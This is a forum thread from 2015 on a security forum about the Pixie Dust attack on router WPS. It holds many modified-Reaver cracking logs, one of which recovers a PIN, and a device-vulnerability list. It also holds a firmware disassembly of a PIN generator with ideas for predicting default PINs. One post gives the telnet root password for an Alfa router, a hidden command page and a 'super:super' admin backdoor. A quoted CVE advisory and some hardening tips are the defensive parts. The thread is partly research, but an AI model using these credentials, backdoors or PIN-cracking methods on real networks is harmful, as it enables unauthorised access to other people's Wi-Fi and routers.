[P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56 :32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:f e:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de: 7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81 :76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a 9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3: d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c :91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c 6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c: 86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01 :c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:9 3:7e:7d:c9:0b:d8:62:fc:37
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: P-660W-T1 v3
[P] Access Point Serial Number: 00000001
[+] Received M1 message
[P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa :04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:8 8:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e: 79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05 :15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:7 6:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4: 1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27 :a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7 f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f: 42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a :18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:2 1:fa:2c:2c:73:57:88:f4:0b
[P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c :4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
[+] Sending M2 message
[P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b :8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
[P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9 :47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]


http://imgur.com/1MrIW4K



Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
[P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68 :dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a 6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0: 01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70 :bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b 5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39: d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3 :f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:8 8:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3: 81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09 :68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8 e:b5:ea:f8:81:f4:74:d9:fc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 14CC200000*
[+] Received M1 message
[P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a :07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:0 2:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53: fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6 :b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:1 2:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a: 5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81 :5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:b a:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd: 02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e :8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:4 8:d6:39:97:68:4f:fb:28:bc
[P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e :3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
[+] Sending M2 message
[P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a :52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
[P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51 :40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]




AND This AP VULNERABLE , pixi sees true values



Trying pin 12345670.
.............................
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: ................
e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04: b9:80
[P] AuthKey:
[+] Sending M2 message
[P] E-Hash1:
[P] E-Hash2:
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
[Pixie-Dust] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
[Pixie-Dust] [+] WPS pin: 71632285
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]


http://imgur.com/zlmrfjO

I think this is problem so Pixie not vulnerable , Realtek ,brodcom and atheros chipsets ....

I don t know but probably

kcdtv
2015-04-28, 11:38
hello
Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )

"Pixie sees wrong values."
pixiewps ( you have another thread to speak about it ) does not "see" any value,
Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)
cheers

unsuns06
2015-04-28, 16:45
Try this PIN: 76757891

IT'S THE 3RD TIME I TRY TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

How did you get this PIN ?

I'll try it later this week, because I'm travelling right now.

When will the new update of pixie be released ?

Many thanks.

nuroo
2015-04-28, 16:52
When it's ready. I was told very soon. Kept checking back here. Or u could follow the github

soxrok2212
2015-04-28, 17:18
IT'S THE 3RD TIME I TRY TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

How did you get this PIN ?

I'll try it later this week, because I'm travelling right now.

When will the new update of pixie be released ?

Many thanks.

Beta tool :)

aanarchyy
2015-04-28, 18:18
Beta tool :)

Will said beta tool ever be released? I wanna play too ;)
Or maybe even an email?

Saydamination
2015-04-28, 18:23
hello
Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )

pixiewps ( you have another thread to speak about it ) does not "see" any value,
Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)
cheers

Thanks @kcdtv ..

I will do it... :)

soxrok2212
2015-04-28, 18:26
Will said beta tool ever be released? I wanna play too ;)
Or maybe even an email?

Yeah probably this week. We're just testing to make sure it works and ironing out bugs if we find any. Kudos to Wiire!!! He's an awesome dev :)

nuroo
2015-04-28, 18:54
I can beta also

someone_else
2015-04-28, 19:39
3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable [IMG]
Help would be appreciated

Hi,
Got the Firmware, unpacked with fmk, checked with idapro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but i'm not as good in mips, the (in my opinion) important parts are marked, maybe someone, who's familiarized with mips can tell something about.



LOAD:0040C4C4 la $t9, gettimeofday
LOAD:0040C4C8 move $a1, $zero
LOAD:0040C4CC jalr $t9 ; gettimeofday
LOAD:0040C4D0 addiu $a0, $sp, 0xF0+var_68
LOAD:0040C4D4 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4D8 lw $a0, 0xF0+var_68($sp)
LOAD:0040C4DC la $t9, srand
LOAD:0040C4E0 nop
LOAD:0040C4E4 jalr $t9 ; srand
LOAD:0040C4E8 nop
LOAD:0040C4EC lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4F0 nop
LOAD:0040C4F4 la $t9, rand
LOAD:0040C4F8 nop
LOAD:0040C4FC jalr $t9 ; rand
LOAD:0040C500 nop
LOAD:0040C504 li $v1, 0x6B5FCA6B
LOAD:0040C50C mult $v0, $v1
LOAD:0040C510 sra $a0, $v0, 31
LOAD:0040C514 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C518 nop
LOAD:0040C51C la $t9, 0x400000
LOAD:0040C520 nop
LOAD:0040C524 addiu $t9, (sub_404128 - 0x400000)
LOAD:0040C528 mfhi $v1
LOAD:0040C52C sra $v1, 22
LOAD:0040C530 subu $a1, $v1, $a0
LOAD:0040C534 sll $a0, $a1, 5
LOAD:0040C538 subu $a0, $a1
LOAD:0040C53C sll $v1, $a0, 6
LOAD:0040C540 subu $v1, $a0
LOAD:0040C544 sll $v1, 3
LOAD:0040C548 addu $v1, $a1
LOAD:0040C54C sll $a0, $v1, 2
LOAD:0040C550 addu $v1, $a0
LOAD:0040C554 sll $v1, 7
LOAD:0040C558 subu $a1, $v0, $v1
LOAD:0040C55C sll $s0, $a1, 2
LOAD:0040C560 move $a0, $a1
LOAD:0040C564 jalr $t9 ; sub_404128
LOAD:0040C568 addu $s0, $a1
LOAD:0040C56C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C570 sll $s0, 1
LOAD:0040C574 addu $a0, $s0, $v0
LOAD:0040C578 la $t9, 0x400000
LOAD:0040C57C nop
LOAD:0040C580 addiu $t9, (sub_403F60 - 0x400000)
LOAD:0040C584 jalr $t9 ; sub_403F60
LOAD:0040C588 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C58C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C590 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C594 la $a0, 0x440000
LOAD:0040C598 la $t9, printf
LOAD:0040C59C nop
LOAD:0040C5A0 jalr $t9 ; printf
LOAD:0040C5A4 addiu $a0, (aPinS - 0x440000) # "PIN: %s\n"
LOAD:0040C5A8 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C5AC li $a0, 0xADAC
LOAD:0040C5B0 addu $a0, $s2, $a0
LOAD:0040C5B4 la $t9, strcpy
LOAD:0040C5B8 b loc_40C8C0
LOAD:0040C5BC addiu $a1, $sp, 0xF0+var_D0

kcdtv
2015-04-28, 21:44
WoW
Thank you SO MUCH someone else ( i mean you, not someone else )
It is much more "readable" than what i got. ;)
i am not used to MIPs neither (my poor skills in dissembling speak for-themselves :P )
i wil try to with the tool you used, i am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
The very last line you underline is definitely like a simple "printf" that's "stdout" the value of the PIN

SO GREAT! ;)
first, thanks to you, we know 100% sure that building time is the string used with some randomization.
the startup.sh script was giving a strong clue : time was "generated" just before the PIN....
Another clue : we already know that time is used as a seed for the diffie Hellman key exchange.
Now we know : time is definitely and surely used to generate the default PIN
And it is the first build time.

That's kind of an issue if we look in a way to generate the exact default PIN. . depending of the randomization, but it looks like this with the devices i saw; we might be able to guess the firsts digit correctly realtioning with the year of production,,,, then the PIN respects the checksum so the seconds start on 7 digits
One hour is 3600 seconds and we would need to have maximum about 15 minutes more or less from exact building time to get the first half of PIN... sorry for my english, but i guess you see what i mean...
but a little pixie flying around told me that this kind of "unsuported realteck" would, maybe, who knows?, not be unsupported anymore for so long....
thanks so much for the information and it is helping a lot................. ;)

aanarchyy
2015-04-29, 01:20
DOH! How did i forget about fmk, but last i used it was when i was taking part in "jailbreaking" the neotv 300b. Looks like i got some playing to do :-D

reversetheg@p
2015-04-29, 03:10
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information

2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable http://pix.toile-libre.org/upload/original/1430055858.png
Help would be appreciated

Hello kcdtv,

I have same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, not only that but change mac address. There's 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp

Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled on source code :rolleyes: ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device

With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:

// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"

// generate a "random" WPS pin
# flash -gen-pin

// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444

// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014

// change mac address temporarily (untill reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111

About that pin generator -gen-pin I did find stuff over some extracted files from firmware, but I missed some stuff that I need to extract again cause it was long ago and over telnet I saw more info.

Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked() maybe it will help to look it up.

Congrats everyone for your efforts

kcdtv
2015-04-29, 17:08
WoW && WoW
Like someone else you are amazing too :D
Thta's actualy one of the most exiting thread , full of amazing people, you guys rules! :cool:

- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
YES!
You don't know how much I was looking for that!
'cause I noticed telnet is enabled even-thought there is no way to enable / or disable it / or configure it (from the web interface with the proposed option)
But I couldn't log in.
Now i can :cool: thank you SO MUCH that's awsome
By the way, did you noticed this permanent "super" backdoor?
With credentials super:super you can log with administrator privileges. (but not in telnet)
http://pix.toile-libre.org/upload/original/1430310175.jpg

- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
i get a 404 error when i try to acess this web page or if i try to execute a command through POST request (but i am not use at all to this so maybe i do something wrong)
i also use version v3.2.0.2.6 different then your. I should make a downgade to check al this very interesting and fundamentals elements that you bring to us.
Thanks for showing us and explaining us all this system around PIN managment (and so much more, this are tremendous informations )

someone_else
2015-04-29, 21:59
@ kcdv
i'm glad, that i could help :o and i'm with you: great thread !

And a little update :

VULNERABLE:

Edimax
Fonera Fon 2.0n (FON 2303B)
Ralink RT 3052


[P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e
[P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70 :dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:4 7:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45: 80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7 :8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c 7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90: 4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07 :9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e 5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5: c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54 :bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b 9:4f:04:41:98:82:25:2a:0a
[P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0 :5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:4 8:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98: d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e :ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:7 1:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff: 64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27 :a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9 b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4: ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22 :89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d 9:75:0a:db:c9:f9:43:ba:83
[P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f :4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34
[P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6 :48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2
[P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe :39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41

soxrok2212
2015-04-30, 00:21
@kcdtv pointed out a newly documented "flaw" I guess i would call it: http://w1.fi/security/2015-1/wpa_supplicant-p2p-ssid-overflow.txt
It was something was I was actually considering a few days ago, but I guess people beat me to it :P
Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for theses purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p but I don't recall.

If you don't want to click the link, it is just a text document:

wpa_supplicant P2P SSID processing vulnerability

Published: April 22, 2015
Identifier: CVE-2015-1863
Latest version available from: http://w1.fi/security/2015-1/


Vulnerability

A vulnerability was found in how wpa_supplicant uses SSID information
parsed from management frames that create or update P2P peer entries
(e.g., Probe Response frame or number of P2P Public Action frames). SSID
field has valid length range of 0-32 octets. However, it is transmitted
in an element that has a 8-bit length field and potential maximum
payload length of 255 octets. wpa_supplicant was not sufficiently
verifying the payload length on one of the code paths using the SSID
received from a peer device.

This can result in copying arbitrary data from an attacker to a fixed
length buffer of 32 bytes (i.e., a possible overflow of up to 223
bytes). The SSID buffer is within struct p2p_device that is allocated
from heap. The overflow can override couple of variables in the struct,
including a pointer that gets freed. In addition about 150 bytes (the
exact length depending on architecture) can be written beyond the end of
the heap allocation.

This could result in corrupted state in heap, unexpected program
behavior due to corrupted P2P peer device information, denial of service
due to wpa_supplicant process crash, exposure of memory contents during
GO Negotiation, and potentially arbitrary code execution.

Vulnerable versions/configurations

wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled

Attacker (or a system controlled by the attacker) needs to be within
radio range of the vulnerable system to send a suitably constructed
management frame that triggers a P2P peer device information to be
created or updated.

The vulnerability is easiest to exploit while the device has started an
active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control
interface command in progress). However, it may be possible, though
significantly more difficult, to trigger this even without any active
P2P operation in progress.


Acknowledgments

Thanks to Google security team for reporting this issue and smart
hardware research group of Alibaba security team for discovering it.


Possible mitigation steps

- Merge the following commits to wpa_supplicant and rebuild it:

P2P: Validate SSID element length before copying it (CVE-2015-1863)

This patch is available from http://w1.fi/security/2015-1/

- Update to wpa_supplicant v2.5 or newer, once available

- Disable P2P (control interface command "P2P_SET disabled 1" or
"p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant
configuration file)

- Disable P2P from the build (remove CONFIG_P2P=y)


That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.

Anyways, I guess SSID information comes from Management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials/article.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted form wi-fi planet) making it a whole lot easier for attackers. There is no encryption to break so it should be a fairly straightforward process :D

If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs/wireless/controller/technotes/5700/software/release/ios_xe_33/11rkw_DeploymentGuide/b_802point11rkw_deployment_guide_cisco_ios_xe_rele ase33/b_802point11rkw_deployment_guide_cisco_ios_xe_rele ase33_chapter_0100.pdf

Let me know what you think about this!

aanarchyy
2015-04-30, 00:31
Where can i get a copy of this firmware everyone is picking apart right now? I've tried to find some arris firmwares(as some seem to be invulerable to pixie) but they are apparently very tightly guarded and i do not own one or i would dump it myself. Definently no downloads for them, but if i get my hands on one physically... different story :-D
email username @ gmail

soxrok2212
2015-04-30, 00:40
Where can i get a copy of this firmware everyone is picking apart right now? I've tried to find some arris firmwares(as some seem to be invulerable to pixie) but they are apparently very tightly guarded and i do not own one or i would dump it myself. Definently no downloads for them, but if i get my hands on one physically... different story :-D
email username @ gmail

http://sourceforge.net/projects/alfanetwork/files/Firmware/

Alfa AIP-W525H I believe.... not sure if it is v1 or v2 though.

nuroo
2015-04-30, 15:35
Manufacturer: Greenwave
Device Name: GreenWave BHR4
Model Number: 4

000000000:6F:D4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|


Greenwave Systems, no wikidevi, fccid (http://fccid.net/number.php?fcc=Z3M-G1100&id=793358#axzz3Yo4s4Bzn)

NOT Vulnerable

aboulatif
2015-04-30, 16:12
not work on technicolor TD5130 V1 and THOMSON AP

soxrok2212
2015-04-30, 18:27
Worked fine for me when I tested. You need to wait for the whole realtek tool to be released. It is almost done.

nuroo
2015-04-30, 19:00
Big Teaser !

aboulatif
2015-04-30, 19:15
soxrok2212 i have tried many time on my network but no result:confused:

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 18:17:25:xx:xx:xx
[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TD5
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1343A1D22901
[+] Received M1 message
[P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
[P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
[P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
[+] Sending M2 message
[P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
[P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]

aboulatif
2015-04-30, 19:16
soxrok2212 i have tried many time on my network but no result:confused:

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 18:17:25:xx:xx:xx
[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TD5
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1343A1D22901
[+] Received M1 message
